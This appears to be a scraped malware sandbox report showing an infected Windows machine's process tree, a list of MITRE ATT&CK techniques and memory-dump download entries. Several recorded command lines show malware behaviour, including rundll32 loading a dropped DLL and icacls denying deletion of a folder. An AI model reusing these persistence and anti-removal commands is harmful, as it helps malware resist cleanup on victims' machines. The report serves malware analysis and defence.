rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6672
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:6688

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5176

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6540

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6392

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7068

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6900
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding AA2D7E70E59A7B8A7E2F5B85C33AA264 C
  2⤵
  PID:7348
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6DAF959B281EBAE7755C9BD005BEEE76
  2⤵
  PID:7868
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:8092
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B73A5B45D41F0EF1B61FB65FDC0BA280 E Global\MSI0000
  2⤵
  PID:4920

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7896
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:7912

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7648

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:8140

C:\Users\Admin\AppData\Local\Temp\375D.exe
C:\Users\Admin\AppData\Local\Temp\375D.exe
1⤵
PID:8096

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4440

C:\Users\Admin\AppData\Local\Temp\73CA.exe
C:\Users\Admin\AppData\Local\Temp\73CA.exe
1⤵
PID:2244
- C:\Users\Admin\AppData\Local\Temp\73CA.exe
  C:\Users\Admin\AppData\Local\Temp\73CA.exe
  2⤵
  PID:5476
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\236e663d-1b74-4a29-b43d-0959d188561a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:4708
- - C:\Users\Admin\AppData\Local\Temp\73CA.exe
    "C:\Users\Admin\AppData\Local\Temp\73CA.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    PID:8372
  - - C:\Users\Admin\AppData\Local\Temp\73CA.exe
      "C:\Users\Admin\AppData\Local\Temp\73CA.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:8264
    - - C:\Users\Admin\AppData\Local\2713ab68-b317-4373-a0b5-337e30c5a45d\build2.exe
        
        "C:\Users\Admin\AppData\Local\2713ab68-b317-4373-a0b5-337e30c5a45d\build2.exe"
        5⤵
        
        PID:8812
      - C:\Users\Admin\AppData\Local\2713ab68-b317-4373-a0b5-337e30c5a45d\build2.exe
        
        "C:\Users\Admin\AppData\Local\2713ab68-b317-4373-a0b5-337e30c5a45d\build2.exe"
        6⤵
        
        PID:8876

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\9945.exe
C:\Users\Admin\AppData\Local\Temp\9945.exe
1⤵
PID:4324

C:\Users\Admin\AppData\Local\Temp\BE72.exe
C:\Users\Admin\AppData\Local\Temp\BE72.exe
1⤵
PID:6308

C:\Users\Admin\AppData\Local\Temp\EEE9.exe
C:\Users\Admin\AppData\Local\Temp\EEE9.exe
1⤵
PID:6624

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/68-741-0x0000018915740000-0x00000189157B4000-memory.dmp

Filesize
464KB

Download
memory/208-745-0x000001A71BE00000-0x000001A71BE74000-memory.dmp

Filesize
464KB

Download
memory/208-732-0x000001A71BD40000-0x000001A71BD8D000-memory.dmp

Filesize
308KB

Download
memory/988-760-0x000002A0BA540000-0x000002A0BA5B4000-memory.dmp

Filesize
464KB

Download
memory/1100-764-0x0000019C10C00000-0x0000019C10C74000-memory.dmp

Filesize
464KB

Download
memory/1400-782-0x0000020E41200000-0x0000020E41274000-memory.dmp

Filesize
464KB

Download
memory/1760-564-0x00000000050C0000-0x00000000056C6000-memory.dmp

Filesize
6.0MB

Download
memory/2108-246-0x0000000002B30000-0x0000000002B45000-memory.dmp

Filesize
84KB

Download
memory/2388-759-0x000001A2FC000000-0x000001A2FC074000-memory.dmp

Filesize
464KB

Download
memory/2396-761-0x0000017C8F150000-0x0000017C8F1C4000-memory.dmp

Filesize
464KB

Download
memory/2612-735-0x0000016AAD230000-0x0000016AAD2A4000-memory.dmp

Filesize
464KB

Download
memory/3160-494-0x0000000005540000-0x0000000005B46000-memory.dmp

Filesize
6.0MB

Download
memory/3504-311-0x0000000004E40000-0x0000000005446000-memory.dmp

Filesize
6.0MB

Download
memory/3836-136-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/3836-135-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/3836-138-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/3836-133-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/3836-137-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/3836-134-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/3836-132-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/4212-169-0x0000000000410000-0x0000000000411000-memory.dmp

Filesize
4KB

Download
memory/4212-184-0x000000001AFF0000-0x000000001AFF2000-memory.dmp

Filesize
8KB

Download
memory/4224-190-0x0000000005220000-0x0000000005221000-memory.dmp

Filesize
4KB

Download
memory/4224-277-0x0000000007483000-0x0000000007484000-memory.dmp

Filesize
4KB

Download
memory/4224-251-0x0000000009950000-0x0000000009983000-memory.dmp

Filesize
204KB

Download
memory/4224-261-0x00000000088F0000-0x00000000088F1000-memory.dmp

Filesize
4KB

Download
memory/4224-266-0x0000000009CD0000-0x0000000009CD1000-memory.dmp

Filesize
4KB

Download
memory/4224-267-0x000000007E9B0000-0x000000007E9B1000-memory.dmp

Filesize
4KB

Download
memory/4224-268-0x0000000009E70000-0x0000000009E71000-memory.dmp

Filesize
4KB

Download
memory/4224-213-0x0000000008350000-0x0000000008351000-memory.dmp

Filesize
4KB

Download
memory/4224-271-0x0000000009F60000-0x0000000009F61000-memory.dmp

Filesize
4KB

Download
memory/4224-198-0x0000000007482000-0x0000000007483000-memory.dmp

Filesize
4KB

Download
memory/4224-214-0x00000000087B0000-0x00000000087B1000-memory.dmp

Filesize
4KB

Download
memory/4224-202-0x0000000007880000-0x0000000007881000-memory.dmp

Filesize
4KB

Download
memory/4224-203-0x0000000007A30000-0x0000000007A31000-memory.dmp

Filesize
4KB

Download
memory/4224-204-0x0000000008160000-0x0000000008161000-memory.dmp

Filesize
4KB

Download
memory/4224-196-0x0000000007480000-0x0000000007481000-memory.dmp

Filesize
4KB

Download
memory/4224-205-0x00000000081D0000-0x00000000081D1000-memory.dmp

Filesize
4KB

Download
memory/4224-192-0x0000000007AC0000-0x0000000007AC1000-memory.dmp

Filesize
4KB

Download
memory/4224-223-0x0000000008110000-0x0000000008111000-memory.dmp

Filesize
4KB

Download
memory/4224-212-0x00000000079E0000-0x00000000079E1000-memory.dmp

Filesize
4KB

Download
memory/4224-220-0x0000000007AA0000-0x0000000007AA1000-memory.dmp

Filesize
4KB

Download
memory/4240-179-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/4256-767-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/4268-533-0x000000001B110000-0x000000001B112000-memory.dmp

Filesize
8KB

Download
memory/4276-209-0x0000000000400000-0x0000000002B61000-memory.dmp

Filesize
39.4MB

Download
memory/4276-206-0x0000000004750000-0x0000000004798000-memory.dmp

Filesize
288KB

Download
memory/4304-194-0x000000001B9F0000-0x000000001B9F1000-memory.dmp

Filesize
4KB

Download
memory/4304-199-0x000000001B5D0000-0x000000001B5D2000-memory.dmp

Filesize
8KB

Download
memory/4304-172-0x00000000008F0000-0x00000000008F1000-memory.dmp

Filesize
4KB

Download
memory/4304-188-0x0000000000DF0000-0x0000000000E05000-memory.dmp

Filesize
84KB

Download
memory/4308-698-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

Filesize
4KB

Download
memory/4368-210-0x0000000000400000-0x0000000002B48000-memory.dmp

Filesize
39.3MB

Download
memory/4368-207-0x0000000002B50000-0x0000000002BFE000-memory.dmp

Filesize
696KB

Download
memory/4428-186-0x00000000007B0000-0x00000000007B1000-memory.dmp

Filesize
4KB

Download
memory/4428-200-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/4428-195-0x0000000004FD0000-0x0000000004FD1000-memory.dmp

Filesize
4KB

Download
memory/4428-193-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/4436-524-0x00000000008D0000-0x00000000008D2000-memory.dmp

Filesize
8KB

Download
memory/4440-461-0x000000001B750000-0x000000001B752000-memory.dmp

Filesize
8KB

Download
memory/4444-211-0x0000000000400000-0x0000000002BB2000-memory.dmp

Filesize
39.7MB

Download
memory/4444-208-0x0000000004880000-0x0000000004951000-memory.dmp

Filesize
836KB

Download
memory/4576-201-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4748-232-0x00000000060C0000-0x00000000060C1000-memory.dmp

Filesize
4KB

Download
memory/4748-229-0x0000000005180000-0x0000000005786000-memory.dmp

Filesize
6.0MB

Download
memory/4748-226-0x00000000052D0000-0x00000000052D1000-memory.dmp

Filesize
4KB

Download
memory/4748-215-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/4748-224-0x0000000005230000-0x0000000005231000-memory.dmp

Filesize
4KB

Download
memory/4748-225-0x0000000005360000-0x0000000005361000-memory.dmp

Filesize
4KB

Download
memory/4748-221-0x0000000005790000-0x0000000005791000-memory.dmp

Filesize
4KB

Download
memory/4780-596-0x0000000000400000-0x0000000002BB2000-memory.dmp

Filesize
39.7MB

Download
memory/4780-579-0x00000000048D0000-0x00000000049A1000-memory.dmp

Filesize
836KB

Download
memory/4792-362-0x0000000004C10000-0x0000000005216000-memory.dmp

Filesize
6.0MB

Download
memory/4924-247-0x0000000005220000-0x0000000005826000-memory.dmp

Filesize
6.0MB

Download
memory/5072-737-0x000001D976300000-0x000001D976374000-memory.dmp

Filesize
464KB

Download
memory/5136-696-0x000000001B660000-0x000000001B662000-memory.dmp

Filesize
8KB

Download
memory/5180-585-0x00000000001D0000-0x00000000001FF000-memory.dmp

Filesize
188KB

Download
memory/5180-613-0x0000000000400000-0x0000000002B53000-memory.dmp

Filesize
39.3MB

Download
memory/5268-529-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/5292-588-0x0000000000EB0000-0x0000000000EB1000-memory.dmp

Filesize
4KB

Download
memory/5320-636-0x0000000005340000-0x0000000005946000-memory.dmp

Filesize
6.0MB

Download
memory/5516-616-0x0000000005300000-0x0000000005906000-memory.dmp

Filesize
6.0MB

Download
memory/5544-558-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/5612-726-0x0000000004570000-0x00000000045CF000-memory.dmp

Filesize
380KB

Download
memory/5612-722-0x000000000463E000-0x000000000473F000-memory.dmp

Filesize
1.0MB

Download
memory/5648-740-0x00000000056B0000-0x0000000005CB6000-memory.dmp

Filesize
6.0MB

Download
memory/5692-566-0x00000000010C0000-0x00000000010C2000-memory.dmp

Filesize
8KB

Download
memory/5760-582-0x0000000005660000-0x0000000005661000-memory.dmp

Filesize
4KB

Download
memory/5780-700-0x0000000005690000-0x0000000005C96000-memory.dmp

Filesize
6.0MB

Download
memory/5888-743-0x0000000000400000-0x0000000002575000-memory.dmp

Filesize
33.5MB

Download
memory/5888-729-0x0000000002FC0000-0x00000000038DE000-memory.dmp

Filesize
9.1MB

Download
memory/5900-592-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/5952-658-0x0000000005620000-0x0000000005C26000-memory.dmp

Filesize
6.0MB

Download
memory/5952-639-0x0000000077AE0000-0x0000000077C6E000-memory.dmp

Filesize
1.6MB

Download
memory/6064-610-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/6120-620-0x00000000055D0000-0x00000000055D1000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads